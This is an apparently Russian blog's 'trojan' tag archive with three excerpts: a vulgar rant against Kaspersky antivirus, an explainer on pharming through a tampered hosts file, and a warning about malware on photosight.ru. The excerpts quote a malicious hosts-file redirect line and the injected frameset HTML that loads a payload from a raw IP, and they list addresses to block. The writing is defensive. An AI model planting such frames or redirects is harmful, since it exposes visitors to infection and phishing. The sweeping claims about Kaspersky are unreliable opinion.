Архив метки: trojan

Касперский в своем репердуаре

Я много раз лечил здоровые и зараженные компы путем выпиливания антивируса Касперского и установкой Dr.Web или NOD32. Всем давно известно, что Касперский скорее калечит систему, чем лечит. И вот снова, пиарясь на волне нового вируса под Java на OS X, Kaspersky жидко обосрались: Компания «Лаборатория Касперского» была вынуждена из-за критической ошибки отозвать первую версию своей… Читать далее »

Защита от фарминг-атаки

Фарминг-атаки – это атаки, при которых браузер пользователя скрытно направляется на фишинговый (поддельный) сайт. Файл hosts По умолчанию, файл HOSTS лежит в каталоге %SYSTEMROOT%\system32\drivers\etc (другой вариант указания пути: %WINDIR%\system32\drivers\etc). Вирус изменяет этот файл, прописывая (добавляя) там строку с IP-адресом и именем фишингового сайта (точнее, подделываемого): 1.1.1.1 vkontakte.ru Теперь при заходе на сайт ВКонтакте, браузер пользователя… Читать далее »

Осторожно, вирусы

Сайт photosight.ru сегодня радует своих посетителей java-вирусом. Браузер открывает страницу по коду: <html><frameset rows="100%"><frame src="https://194.8.250.211/tds/in.cgi?2"></frameset></html> и скачивает вирус. Рекомендую заблокировать следующие адреса: 178.63.170.185 (код) 194.8.250.213 (код) 194.8.250.211 (тело вируса) Сайт уже попал в черный список Google и браузеры выводят предупреждающую страницу. Как именно подгружается скрипт пока не наковырял, предполагаю, что есть уязвимость в рекламной (баннерной)… Читать далее »